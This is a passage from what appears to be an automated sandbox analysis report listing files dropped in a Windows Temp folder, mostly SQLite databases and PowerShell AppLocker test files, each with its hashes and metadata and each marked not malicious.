                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\RBJpEU4rfl

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\TJszc0I590

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\ThP6xuVjt4

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                        Category:dropped
                                                                        Size (bytes):28672
                                                                        Entropy (8bit):2.5793180405395284
                                                                        Encrypted:false
                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\TlDs2M9buX

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\Tncur9UuS4

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\UE5CP52aId

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\UeKvcPNE3i

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):49152
                                                                        Entropy (8bit):0.8180424350137764
                                                                        Encrypted:false
                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\UhBKKdgxQK

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\UkoySrw2XL

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\WCnHqEmRyN

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5707520969659783
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\WfifhTsDRA

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):49152
                                                                        Entropy (8bit):0.8180424350137764
                                                                        Encrypted:false
                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\WtP9WGB8ri

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\Wv32ZYty1Q

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5707520969659783
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\X2xdGQRH5P

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\XVOGv22i0s

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\XX0GWw6fpI

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5712781801655107
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\Xwnb7aStCI

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\Xyv6MghvO5

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\ZFJ29xz0hp

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\ZRWpZzahy6

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\ZlHHoyPMl5

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0p23w3qs.em5.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_15qxotgv.ziy.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ktvcpcf.lct.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1mexrlyb.434.psm1

